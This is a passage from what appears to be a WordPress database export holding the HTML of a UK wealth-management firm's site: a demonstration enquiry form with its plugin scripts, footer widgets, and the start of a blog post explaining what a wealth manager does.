Demonstration / Find Out More</p>&#13;\n<p>If you have any questions or would like to see our wealth platform demonstration please fill out the short form below:</p>&#13;\n<div id=\"iphorm-outer-52fe0c9ef1aad\" class=\"iphorm-outer iphorm-outer-2 iphorm-uniform-theme-default iphorm-theme-light-rounded\">&#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n	<!--\r\n		    jQuery(document).ready(function($) {\r\n			\r\n        	$(\'#iphorm-52fe0c9ef1aad\').iPhorm({\"id\":2,\"uniqueId\":\"52fe0c9ef1aad\",\"PHPSESSID\":\"95deae3b676a1decee14da6c4670c30a\",\"useAjax\":true,\"successMessageTimeout\":10,\"clElementIds\":[],\"clDependentElementIds\":[],\"centerFancybox\":true,\"centerFancyboxSpeed\":true});\r\n\r\n	        	        if ($.isFunction($.fn.qtip)) {\r\n	            $(\'.iphorm-tooltip-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow qtip-rounded\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow qtip-rounded\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'focus\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow qtip-rounded\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow qtip-rounded\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'click\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-labels-inside > .iphorm-element-spacer > label\').hover(function () {\r\n	                $(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'show\');\r\n	            }, function () {\r\n	            	$(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'hide\');\r\n	            });\r\n	        }\r\n	        \r\n	        	        if ($.isFunction($.fn.uniform)) {\r\n	            $(\'select, input:checkbox, input:radio\', iPhorm.instance.$form).uniform({context: iPhorm.instance.$form, selectAutoWidth: false});\r\n	        }\r\n	        \r\n	        if ($.isFunction($.fn.inFieldLabels)) {\r\n	            $(\'.iphorm-labels-inside:not(.iphorm-element-wrap-recaptcha) > .iphorm-element-spacer > label\', iPhorm.instance.$form).inFieldLabels();\r\n	        }\r\n\r\n	        \r\n	        $(\'.iphorm-group-row > div:last-child:not(:first-child)\', iPhorm.instance.$form).add(\'.iphorm-group-row:last-child\', iPhorm.instance.$form).addClass(\'last-child\');\r\n\r\n	        	    }); // end document.ready()\r\n	//-->\r\n	]]></script><form id=\"iphorm-52fe0c9ef1aad\" class=\"iphorm iphorm-form-2\" action=\"http://www.equalitywalk.org.uk/wealth-platform/#iphorm-52fe0c9ef1aad\" method=\"post\" enctype=\"multipart/form-data\">&#13;\n        <div class=\"iphorm-inner iphorm-inner-2\">&#13;\n            <input type=\"hidden\" name=\"iphorm_id\" value=\"2\"/><input type=\"hidden\" name=\"iphorm_uid\" value=\"52fe0c9ef1aad\"/><input type=\"hidden\" name=\"form_url\" value=\"http://www.equalitywalk.org.uk/wealth-platform/\"/><input type=\"hidden\" name=\"referring_url\" value=\"\"/><input type=\"hidden\" name=\"post_id\" value=\"34\"/><input type=\"hidden\" name=\"post_title\" value=\"Wealth Platform\"/><div class=\"iphorm-success-message iphorm-hidden\"/>&#13;\n            	                        <div class=\"iphorm-elements iphorm-elements-2 iphorm-clearfix\">&#13;\n                <div class=\"iphorm-group-wrap iphorm_2_6-group-wrap iphorm-clearfix iphorm-labels-above iphorm-group-style-plain iphorm-group-alignment-proportional\">&#13;\n    <div class=\"iphorm-group-elements\">&#13;\n                <div class=\"iphorm-group-row iphorm-clearfix iphorm-group-row-1cols\"><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_2_1-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_2_1-element-spacer\">&#13;\n                    <label for=\"iphorm_2_1_52fe0c9ef1aad\">&#13;\n                Name                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_2_1-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_2_1\" id=\"iphorm_2_1_52fe0c9ef1aad\" type=\"text\" name=\"iphorm_2_1\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div>        </div> <!-- /.iphorm-group-row -->&#13;\n    </div> <!-- /.iphorm-group-elements -->&#13;\n</div> <!-- /.iphorm-group-wrap --><div class=\"iphorm-group-wrap iphorm_2_8-group-wrap iphorm-clearfix iphorm-labels-above iphorm-group-style-plain iphorm-group-alignment-proportional\">&#13;\n    <div class=\"iphorm-group-elements\">&#13;\n                <div class=\"iphorm-group-row iphorm-clearfix iphorm-group-row-2cols\"><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_2_5-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_2_5-element-spacer\">&#13;\n                    <label for=\"iphorm_2_5_52fe0c9ef1aad\">&#13;\n                Contact Number                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_2_5-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_2_5\" id=\"iphorm_2_5_52fe0c9ef1aad\" type=\"text\" name=\"iphorm_2_5\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_2_2-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_2_2-element-spacer\">&#13;\n                    <label for=\"iphorm_2_2_52fe0c9ef1aad\">&#13;\n                Email address                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_2_2-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_2_2\" id=\"iphorm_2_2_52fe0c9ef1aad\" type=\"text\" name=\"iphorm_2_2\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div></div><div class=\"iphorm-group-row iphorm-clearfix iphorm-group-row-2cols\"><div class=\"iphorm-element-wrap iphorm-element-wrap-checkbox iphorm_2_11-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-checkbox iphorm_2_11-element-spacer\">&#13;\n                    <label class=\"iphorm_2_11-outer-label\">&#13;\n                What Would You Like To Discuss?                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-checkbox iphorm_2_11-input-wrap\">&#13;\n            <div class=\"iphorm-input-ul iphorm-input-checkbox-ul iphorm_2_11-input-ul iphorm-options-block iphorm-clearfix\">&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_2_11-input-li\">&#13;\n                    <label class=\"iphorm_2_11_1_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_2_11 iphorm_2_11_1\" type=\"checkbox\" name=\"iphorm_2_11[]\" id=\"iphorm_2_11_52fe0c9ef1aad_1\" value=\"Pensions\"/>&#13;\n                        Pensions                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_2_11-input-li\">&#13;\n                    <label class=\"iphorm_2_11_2_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_2_11 iphorm_2_11_2\" type=\"checkbox\" name=\"iphorm_2_11[]\" id=\"iphorm_2_11_52fe0c9ef1aad_2\" value=\"Insurance\"/>&#13;\n                        Insurance                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_2_11-input-li\">&#13;\n                    <label class=\"iphorm_2_11_3_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_2_11 iphorm_2_11_3\" type=\"checkbox\" name=\"iphorm_2_11[]\" id=\"iphorm_2_11_52fe0c9ef1aad_3\" value=\"Trusts\"/>&#13;\n                        Trusts                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_2_11-input-li\">&#13;\n                    <label class=\"iphorm_2_11_4_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_2_11 iphorm_2_11_4\" type=\"checkbox\" name=\"iphorm_2_11[]\" id=\"iphorm_2_11_52fe0c9ef1aad_4\" value=\"Investments\"/>&#13;\n                        Investments                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_2_11-input-li\">&#13;\n                    <label class=\"iphorm_2_11_5_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_2_11 iphorm_2_11_5\" type=\"checkbox\" name=\"iphorm_2_11[]\" id=\"iphorm_2_11_52fe0c9ef1aad_5\" value=\"Wealth\"/>&#13;\n                        Wealth                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_2_11-input-li\">&#13;\n                    <label class=\"iphorm_2_11_6_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_2_11 iphorm_2_11_6\" type=\"checkbox\" name=\"iphorm_2_11[]\" id=\"iphorm_2_11_52fe0c9ef1aad_6\" value=\"Other\"/>&#13;\n                        Other                    </label>&#13;\n                </div>&#13;\n                        </div>&#13;\n                    </div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n</div><div class=\"iphorm-element-wrap iphorm-element-wrap-textarea iphorm_2_10-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-textarea iphorm_2_10-element-spacer\">&#13;\n                    <label for=\"iphorm_2_10_52fe0c9ef1aad\">&#13;\n                Comments                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-textarea iphorm_2_10-input-wrap\">&#13;\n            <textarea class=\"iphorm-element-textarea  iphorm_2_10\" id=\"iphorm_2_10_52fe0c9ef1aad\" name=\"iphorm_2_10\" rows=\"5\" cols=\"25\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div>        </div> <!-- /.iphorm-group-row -->&#13;\n    </div> <!-- /.iphorm-group-elements -->&#13;\n</div> <!-- /.iphorm-group-wrap --><div class=\"iphorm-element-wrap iphorm-element-wrap-captcha iphorm_2_4-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-captcha iphorm_2_4-element-spacer\">&#13;\n                    <label for=\"iphorm_2_4_52fe0c9ef1aad\">&#13;\n                Type the characters                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-captcha iphorm_2_4-input-wrap\">&#13;\n            <input class=\"iphorm-element-captcha  iphorm_2_4\" id=\"iphorm_2_4_52fe0c9ef1aad\" type=\"text\" name=\"iphorm_2_4\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-captcha-image-wrap iphorm-clearfix iphorm_2_4-captcha-image-wrap\">&#13;\n            <div class=\"ifb-captcha-image-inner\">&#13;\n                <img id=\"iphorm-captcha-image-iphorm_2_4_52fe0c9ef1aad\" class=\"iphorm-captcha-image\" src=\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder/includes/captcha.php?c=eyJ1bmlxSWQiOiI1MmZlMGM5ZWYxYWFkIiwidG1wRGlyIjoiXC90bXBcLyIsIm9wdGlvbnMiOnsibGVuZ3RoIjoiNSIsIndpZHRoIjoiMTE1IiwiaGVpZ2h0IjoiNDAiLCJiZ0NvbG91ciI6IiNGRkZGRkYiLCJ0ZXh0Q29sb3VyIjoiIzIyMjIyMiIsImZvbnQiOiJUeXBpc3QudHRmIiwibWluRm9udFNpemUiOiIxMiIsIm1heEZvbnRTaXplIjoiMTkiLCJtaW5BbmdsZSI6IjAiLCJtYXhBbmdsZSI6IjIwIn19&amp;t=1392381087.0056\" alt=\"\"/></div>&#13;\n        </div>&#13;\n&#13;\n        <script type=\"text/javascript\"><![CDATA[\r\n        <!--\r\n        jQuery(document).ready(function ($) {\r\n            $(\'#iphorm-captcha-image-iphorm_2_4_52fe0c9ef1aad\').hover(function () {\r\n                $(this).stop().fadeTo(\'slow\', \'0.3\');\r\n            }, function () {\r\n                $(this).stop().fadeTo(\'slow\', \'1.0\');\r\n            }).click(function () {\r\n                var newSrc = $(this).attr(\'src\').replace(/&t=.+/, \'&t=\' + new Date().getTime());\r\n                $(this).attr(\'src\', newSrc);\r\n            });\r\n        });\r\n        //-->\r\n        ]]></script><div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n</div><div class=\"iphorm-hidden\">&#13;\n    <label>This field should be left blank<input type=\"text\" name=\"iphorm_2_0\"/></label>&#13;\n</div>                <div class=\"iphorm-submit-wrap iphorm-submit-wrap-2 iphorm-clearfix\">&#13;\n                	<div class=\"iphorm-submit-input-wrap iphorm-submit-input-wrap-2\">&#13;\n                        <button class=\"iphorm-submit-element\" type=\"submit\" name=\"iphorm_submit\" style=\"font-size: 20px;font-weight: bold;background-color: rgb(255, 255, 255);position: centre;\"><span style=\"padding-top: 15px;padding-bottom: 15px;padding-right: 10px;padding-left: 27px;background: rgb(255, 134, 54);\"><em style=\"text-shadow: 0px 0px rgb(255, 0, 0);color: rgb(255, 255, 255);\">Send Enquiry / Get Advice</em></span></button>&#13;\n                    </div>&#13;\n                    <div class=\"iphorm-loading-wrap\"><span class=\"iphorm-loading\">Please wait...</span></div>&#13;\n                </div>&#13;\n            </div>&#13;\n                                            </div>&#13;\n            &#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n	<!--\r\n	jQuery(\'#iphorm-outer-52fe0c9ef1aad script\').remove();\r\n	//-->\r\n	]]></script></form></div>&#13;\n<p/></div><div class=\"clearboth\"/>&#13;\n</div></div>&#13;\n			</div>&#13;\n					</div>&#13;\n			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/how-much-money-can-i-get-pension/\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"http://www.equalitywalk.org.uk/portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/11/cats-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"cats\"/></a>&#13;\n						<a href=\"http://www.equalitywalk.org.uk/portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/10/cric-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"cric\"/></a>&#13;\n						<a href=\"http://www.equalitywalk.org.uk/portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/10/auto-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"auto\"/></a>&#13;\n						<a href=\"http://www.equalitywalk.org.uk/portfolio-items/investing-income/\" title=\"Investing For Income\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/10/investing-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"investing\"/></a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\"><p>Connect With Us</p>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://www.equalitywalk.org.uk/feed/\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																					</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	&#13;\n	<!-- W3TC-include-js-head -->&#13;\n&#13;\n	&#13;\n<script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main-min.js\"/></body>','Wealth Management Platform - Manage Your Wealth In One Place','Our Wealth Platform lets you keep all your financial plans, pensions & investments in one place, making it easy to review investments 24-7.','publish','closed','closed','','wealth-management-platform-manage-your-wealth-in-one-place','','','2017-09-21 16:34:43','2017-09-21 16:34:43','',0,'http://www.equalitywalk.org.uk/wealth-management-platform-manage-your-wealth-in-one-place',0,'page','',0),(117,1,'2017-09-21 16:34:43','2017-09-21 16:34:43','<body class=\"single single-post postid-6593 single-format-standard light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			&#13;\n			<div class=\"alignright\">&#13;\n				<div class=\"top-menu\">&#13;\n	<ul id=\"snav\" class=\"menu\"><li id=\"menu-item-4739\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4739\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-4811\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4811\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-5319\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-5319\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-6369\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6369\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-6489\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6489\"><a href=\"../resources/\">Resources</a></li>&#13;\n<li id=\"menu-item-5417\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-5417\"><a href=\"../our-blog/\">Blog</a></li>&#13;\n<li id=\"menu-item-6142\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-6142\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n<li id=\"menu-item-4746\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4746\"><a href=\"../contact-us/\">Contact</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-6358\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6358\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-6359\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6359\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-6357\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6357\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n			</ul></div>			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"/></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										What Does a Wealth Manager Do?										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/wealth-management/\" title=\"Wealth Management\">Wealth Management</a></li><li>What Does a Wealth Manager Do?</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n					<div id=\"content\" style=\"float:left;\">&#13;\n										<div class=\"single-navigation clearfix\">&#13;\n			<a href=\"../7-pension-release-rules/\" rel=\"prev\">Previous</a>			<a href=\"../how-much-money-can-i-get-pension/\" rel=\"next\">Next</a>		</div>&#13;\n						<div id=\"post-6593\" class=\"post-6593 post type-post status-publish format-standard hentry category-wealth-management tag-wealth-manager post\">&#13;\n												<div class=\"post-content\">&#13;\n				<p>We’ve all been there. Stood in the kitchen at a house party, you get asked the inevitable.</p>&#13;\n<p>“So – what do you do?”</p>&#13;\n<p>The answer comes, and you know what will follow.</p>&#13;\n<p>“I work in <a href=\"../wealth-platform/\" target=\"_blank\">wealth management</a>. I’m a wealth manager.”</p>&#13;\n<p>Cue a circle of blank expressions, a few tentative nods and a quick change of conversation as thoughts head back to the table of sausage rolls and vol-au-vents.<b> </b></p>&#13;\n<p>But it’s a good question. The braver party-goer may take the step of enquiring “Yes – but what does a wealth manager actually <i>do</i>? What is wealth management?”</p>&#13;\n<p>Allow me to explain. Wealth comes in many forms – so a wealth manager has a diverse job. Clients will come to a wealth manager for assistance with anything from property, investments, pensions, trusts and insurance through to more complex accumulations of wealth. In most cases, the client’s wealth is made up from a variety of the above.</p>&#13;\n<p><b>It’s down to the wealth manager to ensure that all the client’s assets are managed collectively and effectively.</b></p>&#13;\n<p> </p>&#13;\n<style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.1-1;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box \" style=\"background-color:#f6f6f6 !important;border-width:1px;border-color:#f6f6f6!important;border-left-width:3px !important;border-left-color:#afd9a5!important;border-style:solid;\"><h2><b>Your Wealth Manager Works for YOU – Whatever Your Needs.</b></h2><p>What a Wealth Manager does for you depends entirely upon your situation and your needs. While many cases are similar, the intricacies of each client’s personal situation will lead to an individual solution – a wealth strategy that is unique to each client.</p>&#13;\n<p> </p>&#13;\n<p>This solution is tailored and crafted as a direct result of full and frank discussions between the wealth manager and client. These discussions are an on-going process and as financial situations change, so do the strategies employed by the wealth manager. It’s organic because the financial outlook an ever-evolving picture. A risk profile is drawn up early on in the process – and some clients may want a good return taking minimal risks, while others may be happier with a riskier 